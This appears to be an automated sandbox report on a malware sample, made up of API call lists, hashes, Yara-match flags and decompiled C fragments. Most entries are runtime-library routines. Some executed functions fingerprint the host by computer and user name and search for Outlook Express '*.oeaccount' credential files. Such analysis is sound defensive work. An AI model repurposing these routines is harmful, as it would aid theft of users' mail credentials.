                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleInputRead$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 838051604-0
                                                  • Opcode ID: bae087c77f5f63c5ed4478965d096d05baef344bde32c33c0823c5e1524f05c9
                                                  • Instruction ID: 3a58c0c689105e8232f83965fdb455ef856c14b42160460de87c757a56c8dfde
                                                  • Opcode Fuzzy Hash: bae087c77f5f63c5ed4478965d096d05baef344bde32c33c0823c5e1524f05c9
                                                  • Instruction Fuzzy Hash: 1EF01236540504ABCB222F95DC08C8ABFE7FF8D3513254459F69983570DF31E8559B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • PeekConsoleInputA.KERNEL32(?,?,?), ref: 00B07AEE
                                                  • GetLastError.KERNEL32 ref: 00B07AFA
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B07B0A
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • PeekConsoleInputA.KERNEL32(?,?,?), ref: 00B07B1D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleInputPeek$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 1545762386-0
                                                  • Opcode ID: f5390ad21ac87d804f305866e53d3b2e943e38f71eec7640ba994b8b2df9b023
                                                  • Instruction ID: 3d958068cb4f1221f463e0aa0cb763e752902b987ccea687713ef7e97b9ffd9e
                                                  • Opcode Fuzzy Hash: f5390ad21ac87d804f305866e53d3b2e943e38f71eec7640ba994b8b2df9b023
                                                  • Instruction Fuzzy Hash: 13F03736540644BBCB222F95DC08C46BFF7EF8D3613154499F65983530DF31E8A69B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ReadConsoleInputW.KERNEL32(?,?,?), ref: 00B07A50
                                                  • GetLastError.KERNEL32 ref: 00B07A5C
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B07A6C
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • ReadConsoleInputW.KERNEL32(?,?,?), ref: 00B07A7F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleInputRead$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 838051604-0
                                                  • Opcode ID: 028e2355fe44a659333fb691004a14469242b435a0a32736aa1b6d9b540976a6
                                                  • Instruction ID: 7a3ace634866e5d6056b7d8c96523ce448513c773125affcca05529191c05e46
                                                  • Opcode Fuzzy Hash: 028e2355fe44a659333fb691004a14469242b435a0a32736aa1b6d9b540976a6
                                                  • Instruction Fuzzy Hash: 48F01C3A540508ABCB222FD5DC08C8ABFE7EF8D3613254895F59A83530DF32E8659B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WriteConsoleW.KERNEL32(00000000,D77501FB,?,00000000,00000000,?,00B07F07,00000000,00000001,00000000,00000000,?,00AF9B9A,00000000,00441F0F,00000000), ref: 00B103A7
                                                  • GetLastError.KERNEL32(?,00B07F07,00000000,00000001,00000000,00000000,?,00AF9B9A,00000000,00441F0F,00000000,00000000,00000000,?,00AFA119,?), ref: 00B103B3
                                                    • Part of subcall function 00B10379: CloseHandle.KERNEL32(FFFFFFFE,00B103C3,?,00B07F07,00000000,00000001,00000000,00000000,?,00AF9B9A,00000000,00441F0F,00000000,00000000,00000000), ref: 00B10389
                                                  • ___initconout.LIBCMT ref: 00B103C3
                                                    • Part of subcall function 00B1033B: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B1036A,00B07EED,00000000,?,00AF9B9A,00000000,00441F0F,00000000,00000000), ref: 00B1034E
                                                  • WriteConsoleW.KERNEL32(00000000,D77501FB,?,00000000,?,00B07F07,00000000,00000001,00000000,00000000,?,00AF9B9A,00000000,00441F0F,00000000,00000000), ref: 00B103D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 96d2e48f2094a011b22b0720eb94e75113a2d1fd85e5bf27b18cffe94879ffe5
                                                  • Instruction ID: fad63db66724fb1f9e3c5dfabb85a807a9da423f704075b738546d9c192458c3
                                                  • Opcode Fuzzy Hash: 96d2e48f2094a011b22b0720eb94e75113a2d1fd85e5bf27b18cffe94879ffe5
                                                  • Instruction Fuzzy Hash: 0DF01C36001118FBCF222F92EC09DDA7F66EF4D7A0F458150FA2896130CB7289A09B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetNumberOfConsoleInputEvents.KERNEL32(?), ref: 00B079AC
                                                  • GetLastError.KERNEL32 ref: 00B079B8
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B079C8
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • GetNumberOfConsoleInputEvents.KERNEL32(?), ref: 00B079D5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleEventsInputNumber$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 1600138625-0
                                                  • Opcode ID: 9fcc34ea2f84ff9568914aa8abda4b84cc77c5d200235be79e575b4beec40bd0
                                                  • Instruction ID: e4cb243bae2050902e03876274414f297d311c8eb85dcd53a0a7c62d98f20240
                                                  • Opcode Fuzzy Hash: 9fcc34ea2f84ff9568914aa8abda4b84cc77c5d200235be79e575b4beec40bd0
                                                  • Instruction Fuzzy Hash: 29E01232944015BBC7212B95EC08C49FFAAEF493613554193F805A3171EF31AC518AD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetConsoleMode.KERNEL32(?), ref: 00B07963
                                                  • GetLastError.KERNEL32 ref: 00B0796F
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B0797F
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • SetConsoleMode.KERNEL32(?), ref: 00B0798C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 3067319862-0
                                                  • Opcode ID: 9782301b6e1e89a32c02d2cae9085ea92532e6c2b1ae452040e09f11ceda97e2
                                                  • Instruction ID: 3c591a256a09f64593fb55c5ecf972ae82b4d158233b86dd9b40e7ea2e562c67
                                                  • Opcode Fuzzy Hash: 9782301b6e1e89a32c02d2cae9085ea92532e6c2b1ae452040e09f11ceda97e2
                                                  • Instruction Fuzzy Hash: 94E01236944015BBC7362B99EC0885EFFEAEF483613554092F80593171EF31AC528AD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?), ref: 00B07A9F
                                                  • GetLastError.KERNEL32 ref: 00B07AAB
                                                    • Part of subcall function 00B07E09: CloseHandle.KERNEL32(FFFFFFFE,00B07BF8,?,00AF4895,?,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07E19
                                                  • ___initconin.LIBCMT ref: 00B07ABB
                                                    • Part of subcall function 00B07BAE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,00B07C69,00AF4888,00B24060,0000002C,00AF4838,00B24000,0000000C,00B17E1B), ref: 00B07BC1
                                                  • GetConsoleMode.KERNEL32(?), ref: 00B07AC8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
                                                  • String ID:
                                                  • API String ID: 3067319862-0
                                                  • Opcode ID: b0c97d593eec53567e978bf83c93e0304c585c4539e030314df4cbc21e026825
                                                  • Instruction ID: 7361693af27c910560c3db3a1e87f1f506573fcfe37d14b2c08da76140ffe1ec
                                                  • Opcode Fuzzy Hash: b0c97d593eec53567e978bf83c93e0304c585c4539e030314df4cbc21e026825
                                                  • Instruction Fuzzy Hash: 0BE012329541197BC7212B95EC1CC4DFFAAFF483617660092F806A3171EF31AC618AD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _free.LIBCMT ref: 00AF45B1
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  • _free.LIBCMT ref: 00AF45C4
                                                  • _free.LIBCMT ref: 00AF45D5
                                                  • _free.LIBCMT ref: 00AF45E6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: efc32d014a7b75a491572348800b9b2c5ee463c341d9d7c60a0f2048119b99bc
                                                  • Instruction ID: 96ee55bbf4d5b13b48037fbd243fd022cf27299f4f4cb0837f5066af5ea86a0f
                                                  • Opcode Fuzzy Hash: efc32d014a7b75a491572348800b9b2c5ee463c341d9d7c60a0f2048119b99bc
                                                  • Instruction Fuzzy Hash: 4EE0ECB18AD1649FDA327F74FD0296A3F61EB88B403814056F60017231CF3909579F8D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004025BA() {
                                                  				void* _t4;
                                                  				void* _t8;
                                                  
                                                  				E00402AE5();
                                                  				E00402A79();
                                                  				if(E004027D9() != 0) {
                                                  					_t4 = E0040278B(_t8, __eflags);
                                                  					__eflags = _t4;
                                                  					if(_t4 != 0) {
                                                  						return 1;
                                                  					} else {
                                                  						E00402815();
                                                  						goto L1;
                                                  					}
                                                  				} else {
                                                  					L1:
                                                  					return 0;
                                                  				}
                                                  			}
                                                  0x004025ba
                                                  0x004025bf
                                                  0x004025cb
                                                  0x004025d0
                                                  0x004025d5
                                                  0x004025d7
                                                  0x004025e2
                                                  0x004025d9
                                                  0x004025d9
                                                  0x00000000
                                                  0x004025d9
                                                  0x004025cd
                                                  0x004025cd
                                                  0x004025cf
                                                  0x004025cf

                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                                    • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                  • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                                  • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                  • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00AD22A6
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00AD22AB
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00AD22B0
                                                    • Part of subcall function 00AD28F0: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00AD2901
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00AD22C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: 5075125210fc87fec1f7c9cdd6bae3a90e3819cbc4af784d8874517ab46a5c51
                                                  • Instruction ID: 4a8583491a3f9cd850e6e73e8ffe6eee518d8a66c8e3543af7832eb9d78aa4fa
                                                  • Opcode Fuzzy Hash: 5075125210fc87fec1f7c9cdd6bae3a90e3819cbc4af784d8874517ab46a5c51
                                                  • Instruction Fuzzy Hash: 04C04824108602582C203BF1632A3EDB3100EF7B84B8018C3F8831770BAE06490BF773
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00B057A5,?,00000050,?,?,?,?,?), ref: 00B055DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: ecd9c84a830eb412433e9886ebdefbc219e46d378fc0a246df86e75424a7df21
                                                  • Instruction ID: 11162890efda4646b09f74672875547a4ac698d0e002aae90f3ac5ab00a62d66
                                                  • Opcode Fuzzy Hash: ecd9c84a830eb412433e9886ebdefbc219e46d378fc0a246df86e75424a7df21
                                                  • Instruction Fuzzy Hash: 3621D862A00904A6DB348A54CD41BEB7BD7EF74B54F5644A4E90AD7A80FB32DD40CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  C-Code - Quality: 100%
                                                  			E0040724C(signed int _a4) {
                                                  				char _v5;
                                                  				char _v6;
                                                  				char _v7;
                                                  				char _v8;
                                                  				char _v9;
                                                  				char _v10;
                                                  				char _v11;
                                                  				char _v12;
                                                  				char _v13;
                                                  				char _v14;
                                                  				char _v15;
                                                  				char _v16;
                                                  				char _v17;
                                                  				char _v18;
                                                  				char _v19;
                                                  				void _v20;
                                                  				long _v24;
                                                  				int _v28;
                                                  				int _v32;
                                                  				void* _v36;
                                                  				void _v291;
                                                  				char _v292;
                                                  				void _v547;
                                                  				char _v548;
                                                  				void _v1058;
                                                  				short _v1060;
                                                  				void _v1570;
                                                  				short _v1572;
                                                  				int _t88;
                                                  				signed int _t91;
                                                  				signed int _t92;
                                                  				signed int _t94;
                                                  				signed int _t96;
                                                  				signed int _t99;
                                                  				signed int _t104;
                                                  				signed short* _t110;
                                                  				void* _t113;
                                                  				void* _t114;
                                                  
                                                  				_t92 = 0;
                                                  				_v20 = 0xa3;
                                                  				_v19 = 0x1e;
                                                  				_v18 = 0xf3;
                                                  				_v17 = 0x69;
                                                  				_v16 = 7;
                                                  				_v15 = 0x62;
                                                  				_v14 = 0xd9;
                                                  				_v13 = 0x1f;
                                                  				_v12 = 0x1e;
                                                  				_v11 = 0xe9;
                                                  				_v10 = 0x35;
                                                  				_v9 = 0x7d;
                                                  				_v8 = 0x4f;
                                                  				_v7 = 0xd2;
                                                  				_v6 = 0x7d;
                                                  				_v5 = 0x48;
                                                  				_v292 = 0;
                                                  				memset( &_v291, 0, 0xff);
                                                  				_v548 = 0;
                                                  				memset( &_v547, 0, 0xff);
                                                  				_v1572 = 0;
                                                  				memset( &_v1570, 0, 0x1fe);
                                                  				_v1060 = 0;
                                                  				memset( &_v1058, 0, 0x1fe);
                                                  				_v36 = _a4 + 4;
                                                  				_a4 = 0;
                                                  				_v24 = 0xff;
                                                  				GetComputerNameA( &_v292,  &_v24); // executed
                                                  				_v24 = 0xff;
                                                  				GetUserNameA( &_v548,  &_v24); // executed
                                                  				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                                  				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                                  				_v32 = strlen( &_v292);
                                                  				_t88 = strlen( &_v548);
                                                  				_t113 = _v36;
                                                  				_v28 = _t88;
                                                  				memcpy(_t113,  &_v20, 0x10);
                                                  				_t91 = 0xba0da71d;
                                                  				if(_v28 > 0) {
                                                  					_t110 =  &_v1060;
                                                  					do {
                                                  						_t104 = _a4 & 0x80000003;
                                                  						if(_t104 < 0) {
                                                  							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
                                                  						}
                                                  						_t96 = ( *_t110 & 0x0000ffff) * _t91;
                                                  						_t91 = _t91 * 0xbc8f;
                                                  						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
                                                  						_a4 = _a4 + 1;
                                                  						_t110 =  &(_t110[1]);
                                                  					} while (_a4 < _v28);
                                                  				}
                                                  				if(_v32 > _t92) {
                                                  					do {
                                                  						_t99 = _a4 & 0x80000003;
                                                  						if(_t99 < 0) {
                                                  							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
                                                  						}
                                                  						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
                                                  						_t91 = _t91 * 0xbc8f;
                                                  						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
                                                  						_a4 = _a4 + 1;
                                                  						_t92 = _t92 + 1;
                                                  					} while (_t92 < _v32);
                                                  				}
                                                  				return _t91;
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                  • String ID: 5$H$O$b$i$}$}
                                                  • API String ID: 1832431107-3760989150
                                                  • Opcode ID: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                  • Instruction ID: 8a8033fc9206e0c4c361a826d49ab5f0cafd1e40d7200dcd25d3d532c5214641
                                                  • Opcode Fuzzy Hash: 892f1d25977d50633ddef969ddbe2b4ff3cde350e5ee45bf306cc9825cca91de
                                                  • Instruction Fuzzy Hash: AC510871C0025DBEDB11CBA8CC41AEEBBBDEF49314F0442EAE955E6191D3389B84CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00404837(void* __ecx) {
                                                  				intOrPtr _v8;
                                                  				char _v12;
                                                  				struct HWND__* _t6;
                                                  				_Unknown_base(*)()* _t11;
                                                  				struct HWND__* _t13;
                                                  				struct HWND__* _t15;
                                                  				void* _t20;
                                                  				struct HINSTANCE__* _t23;
                                                  
                                                  				_v12 = 8;
                                                  				_v8 = 0xff;
                                                  				_t15 = 0;
                                                  				_t20 = 0;
                                                  				_t23 = LoadLibraryA("comctl32.dll");
                                                  				if(_t23 == 0) {
                                                  					L5:
                                                  					__imp__#17();
                                                  					_t6 = 1;
                                                  					L6:
                                                  					if(_t6 != 0) {
                                                  						return 1;
                                                  					} else {
                                                  						MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
                                                  						return 0;
                                                  					}
                                                  				}
                                                  				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                  				if(_t11 != 0) {
                                                  					_t20 = 1; // executed
                                                  					_t13 =  *_t11( &_v12); // executed
                                                  					_t15 = _t13;
                                                  				}
                                                  				FreeLibrary(_t23);
                                                  				if(_t20 == 0) {
                                                  					goto L5;
                                                  				} else {
                                                  					_t6 = _t15;
                                                  					goto L6;
                                                  				}
                                                  			}

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(comctl32.dll,74B04DE0,?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 00404856
                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 0040487C
                                                  • #17.COMCTL32(?,00000000,?,?,?,0040B9C9,74B04DE0), ref: 0040488A
                                                  • MessageBoxA.USER32 ref: 004048A7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                  • API String ID: 2780580303-317687271
                                                  • Opcode ID: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                  • Instruction ID: 848b23aeb75660b77c3c697252adc3032e5e70f3caa3a854567a53d2e3e71345
                                                  • Opcode Fuzzy Hash: d22177ebd0c61848c13c07c1ee885c4d1d7d21c72c3c38fe6be86b3f4f770b99
                                                  • Instruction Fuzzy Hash: 3E0126723102017FD7156BA08D48BAF7AACEB84749F008139F602E21C0EBF8C912D6AC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406EC3(void** __eax) {
                                                  				void* __esi;
                                                  				void* _t15;
                                                  				int _t16;
                                                  				int _t17;
                                                  				void* _t26;
                                                  				void** _t38;
                                                  				void** _t40;
                                                  				void* _t45;
                                                  
                                                  				_t40 = __eax;
                                                  				_t15 =  *__eax;
                                                  				if(_t15 != 0xffffffff) {
                                                  					_t16 = FindNextFileA(_t15,  &(__eax[0x52])); // executed
                                                  					 *(_t45 + 4) = _t16;
                                                  					if(_t16 != 0) {
                                                  						goto L5;
                                                  					} else {
                                                  						E00406F5B(_t40);
                                                  						goto L4;
                                                  					}
                                                  				} else {
                                                  					_t26 = FindFirstFileA( &(__eax[1]),  &(__eax[0x52])); // executed
                                                  					 *_t40 = _t26;
                                                  					 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
                                                  					L4:
                                                  					if( *(_t45 + 4) != 0) {
                                                  						L5:
                                                  						_t38 =  &(_t40[0xa2]);
                                                  						_t28 =  &(_t40[0x5d]);
                                                  						_t41 =  &(_t40[0xf3]);
                                                  						_t17 = strlen( &(_t40[0xf3]));
                                                  						if(strlen( &(_t40[0x5d])) + _t17 + 1 >= 0x143) {
                                                  							 *_t38 = 0;
                                                  						} else {
                                                  							E004062AD(_t38, _t41, _t28);
                                                  						}
                                                  					}
                                                  				}
                                                  				return  *(_t45 + 4);
                                                  			}

                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406ED9
                                                  • FindNextFileA.KERNELBASE(?,?,?,?,00410CA1,*.oeaccount,rA,?,00000104), ref: 00406EF7
                                                  • strlen.MSVCRT ref: 00406F27
                                                  • strlen.MSVCRT ref: 00406F2F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFindstrlen$FirstNext
                                                  • String ID: rA
                                                  • API String ID: 379999529-474049127
                                                  • Opcode ID: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                  • Instruction ID: 479c8733b6b08075922562257f7174063dbd0ea9e1486761d8d5d3546bede414
                                                  • Opcode Fuzzy Hash: 9a66d1681466aca7d0b3f0cd3a87e00f7da5b3e9059264b02d426353c7cea173
                                                  • Instruction Fuzzy Hash: 00118272005205AFD714DB34E844ADBB3D9DF44324F21493FF55AD21D0EB38A9548758
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

